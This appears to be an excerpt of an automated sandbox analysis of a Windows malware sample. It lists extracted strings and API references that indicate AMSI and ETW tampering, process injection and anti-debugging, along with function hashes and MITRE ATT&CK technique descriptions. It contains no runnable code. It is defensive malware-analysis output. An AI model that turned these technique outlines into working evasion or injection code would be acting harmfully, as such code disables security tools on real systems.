dbgcore, xrefs: 028589A3, 028589B7
MiniDumpWriteDump, xrefs: 0285899E
NtOpenSection, xrefs: 0285A642
Advapi, xrefs: 0285A0E2, 0285A0F1, 0285A100, 0285A10F, 0285A14B, 0285A15A, 0285A169
NtSetSecurityObject, xrefs: 028589C6
CreateProcessWithLogonW, xrefs: 0285A164
EnumServicesStatusA, xrefs: 0285A0DD
DllGetClassObject, xrefs: 02859840, 0285A510
Ntdll, xrefs: 0285A0A6, 0285A0B5, 0285A0C4, 0285A0D3
NtOpenObjectAuditAlarm, xrefs: 02858976
SLGetGenuineInformation, xrefs: 0285959A
NtMapViewOfSection, xrefs: 0285A6A8
LdrLoadDll, xrefs: 0285A774
SxTracerGetThreadContextDebug, xrefs: 0285980D, 0285A4DD
mssip32, xrefs: 028598BD
NtQuerySecurityObject, xrefs: 0285A70E
NtOpenProcess, xrefs: 028589DA
CreateProcessAsUserA, xrefs: 0285A146
MiniDumpReadDumpStream, xrefs: 028589B2
8)o , xrefs: 028591F2
FlushInstructionCache, xrefs: 0285A303
NtAlertResumeThread, xrefs: 02859D3C
EtwEventWrite, xrefs: 0285A873
NtAccessCheck, xrefs: 0285A741
EnumServicesStatusExA, xrefs: 0285A0FB
NtQueryDirectoryFile, xrefs: 0285A0BF
NtQueryInformationThread, xrefs: 0285A60F
DlpNotifyPreDragDrop, xrefs: 02859B78
VirtualProtect, xrefs: 0285A26A
LdrGetProcedureAddress, xrefs: 0285A7A7
SetUnhandledExceptionFilter, xrefs: 0285A336
RetailTracerEnable, xrefs: 028597DA
OpenSession, xrefs: 02857884, 028579F8, 02857A74, 02857D71, 02857ECA, 02858070, 028581FD, 02858391, 02858510, 02858613, 02858787, 02858A05, 02858BF5, 02858EE6, 0285906C, 028592A2, 028594A8, 0285966C, 0285995B, 02859A0A, 02859C4A, 02859E41, 02859F39, 0285A3EB, 0285A9B3
EnumProcessModules, xrefs: 0285A119
sppc, xrefs: 028595B1, 028595E4, 02859617, 0285964A, 0285A55A, 0285A58D
NtGetWriteWatch, xrefs: 0285A5A9
kernel32, xrefs: 0285A21B, 0285A24E, 0285A281, 0285A2B4, 0285A2E7, 0285A31A, 0285A34D
endpointdlp, xrefs: 02859B8F, 02859BC2, 02859BF5, 02859C28
I_QueryTagInformation, xrefs: 0285898A
psapi, xrefs: 0285A11E
DlpGetArchiveFileTraceInfo, xrefs: 02859BDE
sppwmi, xrefs: 0285A527
NtQuerySystemInformation, xrefs: 0285A0A1
RtlCreateQueryDebugBuffer, xrefs: 02859E08
NtDeviceIoControlFile, xrefs: 0285A0B0
CreateProcessW, xrefs: 0285A137
EtwEventWriteEx, xrefs: 0285A840
NtQueryVirtualMemory, xrefs: 0285A5DC
SLGetSLIDList, xrefs: 028595CD
NtWaitForSingleObject, xrefs: 02859DA2
RtlQueryProcessDebugInformation, xrefs: 0285A0CE
Initialize, xrefs: 02857900, 02857AF0, 02858AFD, 028596E8, 02859A86, 02859FB5, 0285A36F, 0285A8BB
psapi, xrefs: 0285988A
DlpGetWebSiteAccess, xrefs: 02859C11
VirtualAllocEx, xrefs: 0285A237
ScanString, xrefs: 0285797C, 02857BE8, 0285868F, 02858A81, 02858E6A, 02859226, 02859524, 028598DF, 02859CC6, 02859EBD, 0285A467
SLIsGenuineLocalEx, xrefs: 02859600
SLGetEncryptedPIDEx, xrefs: 0285A576
RtlAllocateHeap, xrefs: 02859D6F, 02859DD5
CreateProcessAsUserW, xrefs: 0285A155, 0285A173
ntdll, xrefs: 0285897B, 028589CB, 028589DF, 02859D53, 02859D86, 02859DB9, 02859DEC, 02859E1F, 0285A5C0, 0285A5F3, 0285A626, 0285A659, 0285A68C, 0285A6BF, 0285A6F2, 0285A725, 0285A758, 0285A78B, 0285A7BE, 0285A7F1, 0285A824, 0285A857, 0285A88A
EnumServicesStatusExW, xrefs: 0285A10A
EnumServicesStatusW, xrefs: 0285A0EC
NtWriteVirtualMemory, xrefs: 0285A7DA
UacInitialize, xrefs: 0285887F, 02858C9B
CryptSIPVerifyIndirectData, xrefs: 028598A6
ScanBuffer, xrefs: 02857C79, 02857F46, 028580EC, 02858279, 0285840D, 0285858C, 02858803, 028588FB, 02858D17, 02858FF0, 02859164, 0285939A, 0285942C, 02859764, 02859B02, 0285A031, 0285A937
NtCreateSection, xrefs: 0285A675
spp, xrefs: 02859824, 02859857, 0285A4F4

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: 8)o $Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 376050052-2086206636
Opcode ID: d5847b6cbccd156b3abf2dded68ff9966358f3c31ddade802b8fe640f14bd5f4
Instruction ID: e653ffbb5ffd3a1a9fda7fd478efc92bb517a064794dcece7c3009f2504a4ee7
Opcode Fuzzy Hash: d5847b6cbccd156b3abf2dded68ff9966358f3c31ddade802b8fe640f14bd5f4
Instruction Fuzzy Hash: AD432D7DA101288BDB16EB68DD809DE73B6FF84300F5041E2E509E7754EA70EE858F92

Function 02831727 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 028317D0
Sleep.KERNEL32(0000000A,00000000), ref: 028317E6

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 210bafb5673a69e0fcd93e23a4c870ebc23b7995e57f61c5ad63c47c2cadf862
Instruction ID: 450d57feb0d58a63f9fe06deaccf4f99b283896ef58344ea6b791192e311327e
Opcode Fuzzy Hash: 210bafb5673a69e0fcd93e23a4c870ebc23b7995e57f61c5ad63c47c2cadf862
Instruction Fuzzy Hash: 05B1127EA003508BEB16CF2CD888365BBE1EB85725F1886A9E54ECB3C5D7709461CBD0

Function 028487A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?), ref: 028487B4
GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A

Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74

Strings

bcrypt, xrefs: 028487B3
BCryptVerifySignature, xrefs: 028487C7

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 277d752e63e7a0904a098cd68fb898eb8e04ac683af0231135054320d261ace6
Instruction ID: bfb5027b3d0790b112a68cba289ee43bcb7d34a32836ae4e4ebfa646c17d216d
Opcode Fuzzy Hash: 277d752e63e7a0904a098cd68fb898eb8e04ac683af0231135054320d261ace6
Instruction Fuzzy Hash: 4FF0817DA88219EBEB119A6CA84CB7633BC9741358F0C0929B10CC76C0E7781410AB50

Function 0284870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02848715

Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D

Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02848774

Strings

W, xrefs: 02848721
amsi, xrefs: 02848710
DllGetClassObject, xrefs: 0284873A

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 2980007069-2671292670
Opcode ID: 02bbbadb8e52de5e5b84c5f9041d9baca92d5850e9eb7d5494b1e574985de9af
Instruction ID: e41cd5f0d7560eef3902020fa422f8c68fc207b2451fdd2d64ab7080c339f4d7
Opcode Fuzzy Hash: 02bbbadb8e52de5e5b84c5f9041d9baca92d5850e9eb7d5494b1e574985de9af
Instruction Fuzzy Hash: DDF0A45910C385BAE201E67C8C45F4FBECD4B52224F048A5CF1E8D62D2EA79D1048BB7

Function 0284EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0284EC00
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0284EC12
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0284EC29

Strings

CheckRemoteDebuggerPresent, xrefs: 0284EC0C
KernelBase, xrefs: 0284EBFB

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 6434a407fed6a159718683cf69967ce1dd0673d6f65734b8609a76727851ba29
Instruction ID: b5d655d947dc35719f00eaf550d3d688fbc9cc3a315bc71236421a312581208b
Opcode Fuzzy Hash: 6434a407fed6a159718683cf69967ce1dd0673d6f65734b8609a76727851ba29
Instruction Fuzzy Hash: BFF0A77C90425CBBFB22A7AC88897DCFBA96B05328F640795D424E11D1FB7507448696

Function 02831A8F Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02831B17
Sleep.KERNEL32(0000000A,00000000), ref: 02831B31

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ad8039016cd13b4b156dad24199bb5b2b5e3d3ece3e6b2ffcc57ada4babc4dbf
Instruction ID: e757f7314acfa988f39179effaf9e60616c8067468fa67bb51f9e97793c70f20
Opcode Fuzzy Hash: ad8039016cd13b4b156dad24199bb5b2b5e3d3ece3e6b2ffcc57ada4babc4dbf
Instruction Fuzzy Hash: 1E51BF7D6012408FEB16DF6CC988796BBD0AB45B18F1885AEE54DCB2C2E770D445CBE1

Function 02834168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25f5b18724396ae8efd6d290cdbd74eb11f2b7c5b13750c91d27c5f5f66f145
Instruction ID: e374531805d0e130a0a5b56a8458f3498ea5409b04a2c1de0e3d89f90c30659d
Opcode Fuzzy Hash: c25f5b18724396ae8efd6d290cdbd74eb11f2b7c5b13750c91d27c5f5f66f145
Instruction Fuzzy Hash: 6041AF7DD01214DFDB66DF28E48879A3BE1FB05324F588869E908DB280C7769895CFD2

Function 02848824 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072

Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D

Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74

FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$FreeHandleLibraryMemoryModuleVirtualWrite
String ID:
API String ID: 3430646871-0
Opcode ID: cd174ff84cb0c9015b5e4f7d4ceaca9d7aec5c85f4d7fbafd01fc8f7a4bcf37b
Instruction ID: 0de14735a23cfcc9c0e23d40dc5ea62c11ead13dd9d518b4bbb52eeea46c9dcf
Opcode Fuzzy Hash: cd174ff84cb0c9015b5e4f7d4ceaca9d7aec5c85f4d7fbafd01fc8f7a4bcf37b
Instruction Fuzzy Hash: 5C11847CA44308ABEF02FBBCDC05A5E77B9DB45700F4405A4B608E3B90DE789D006B96

Function 02835814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(207A1B20,?,00000105), ref: 02835832

Part of subcall function 02835A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02835A94
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AB2
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AD0
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001), ref: 02835B55
Part of subcall function 02835A78: RegCloseKey.ADVAPI32(?,02835B84,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 1e80a3bbc37518111bc2fc1a877ffae3138f4f0fc0566828a07790ec136ca274
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: BFE06DB9A002148BCB11DE5CC8C0A9737D8AB08B50F400565EC58DF34AD3B4D9208BD1

Function 02837E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02852A49,ScanString,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,Initialize), ref: 02837E47

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
Instruction ID: 459960a2bfd961c03da75d6f4b79e0c191dbe105e54533840f3f6f402b969908
Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
Instruction Fuzzy Hash: 3AC08CED2122040E5E52A2FC1CC029A42CA0904A353A01B31E43CDA2D2E311D8222491

Function 0285BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM ref: 0285BB60

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: d0786b8aa167220f8148ae0891bd2fa4cae93bf8a9ef91ff338820754565d543
Instruction ID: 4920326fd9e4a406738685cab30795b5aae8827dee937b100c042cef04aa5f9a
Opcode Fuzzy Hash: d0786b8aa167220f8148ae0891bd2fa4cae93bf8a9ef91ff338820754565d543
Instruction Fuzzy Hash: CDC092FC7843003EF62166AC2CC2F33718EE304B14F610412BB00FE2D5E5E24C640A66

Function 02834BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02834BEB

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction ID: 6509dee010251f01cfc184e5feb2af88e33aaa63dd58c7db93f591a5f53f2779
Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
Instruction Fuzzy Hash: 93B0123C24820618FA5355E10D00BB2008C5B5168BF8400919E2CC80C0FF41C41088F3

Function 02834BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02834C03

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: b03e69c5882025466abdee8b3d23e60f75a20912e9bd04f326fd0dcdb862c15a
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: ABA022AC0003030AAF0B232C000002A20333FE0B023CAC0E88008CA0008F3EC000ACF0

Function 02831682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028316A4

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a669a7bab91db20cb42b3a2af6935233a7b8fda59e4b257e86bb6dad1c1a824
Instruction ID: 2683693517bd6c29818727cd30ad420e8f9fd2257c7fa33b699c0402b5ee3d17
Opcode Fuzzy Hash: 2a669a7bab91db20cb42b3a2af6935233a7b8fda59e4b257e86bb6dad1c1a824
Instruction Fuzzy Hash: 71F0FABAB047947BD7118E8A9C80B82BB94FB40720F080139EA4CDB380D7B2A8108BD4

Function 028316E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02831704

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 86c574c5c11301c485f4279c349625d5dfc57258dd40763e2b5c5227eb9289bd
Instruction ID: 485af8e8de8a41dafa4e32522b73fd3f5490ac33a013dfa625bfb92ba7cd91e7
Opcode Fuzzy Hash: 86c574c5c11301c485f4279c349625d5dfc57258dd40763e2b5c5227eb9289bd
Instruction Fuzzy Hash: 29E0867D3003016FE7215A7D4D88712BBD9EB45B74F284975F559DB2D1D7A0D8008BA4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

